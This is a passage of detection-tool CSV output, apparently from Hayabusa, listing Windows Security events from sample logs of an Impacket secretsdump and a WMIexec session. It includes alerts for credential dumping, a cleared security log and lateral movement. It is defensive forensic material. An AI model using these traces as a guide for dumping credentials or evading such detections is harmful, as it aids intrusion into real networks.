18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\BTeHLZkJ.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\NMdzZfem.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:19.875 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:20.003 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.560 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.696 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 20:32:00.171 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63558 : LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63534 : LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 50896 : LogonID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 56740 : LogonID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.483 +09:00,fs03vuln.offsec.lan,4674,low,Lateral Movement Indicator ConDrv,,rules/sigma/builtin/security/win_lateral_movement_condrv.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.546 +09:00,fs03vuln.offsec.lan,4674,low,Lateral Movement Indicator ConDrv,,rules/sigma/builtin/security/win_lateral_movement_condrv.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63564 : LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63565 : LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63566 : LogonID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63567 : LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:27.649 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63564 : LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Program Files\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.306 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 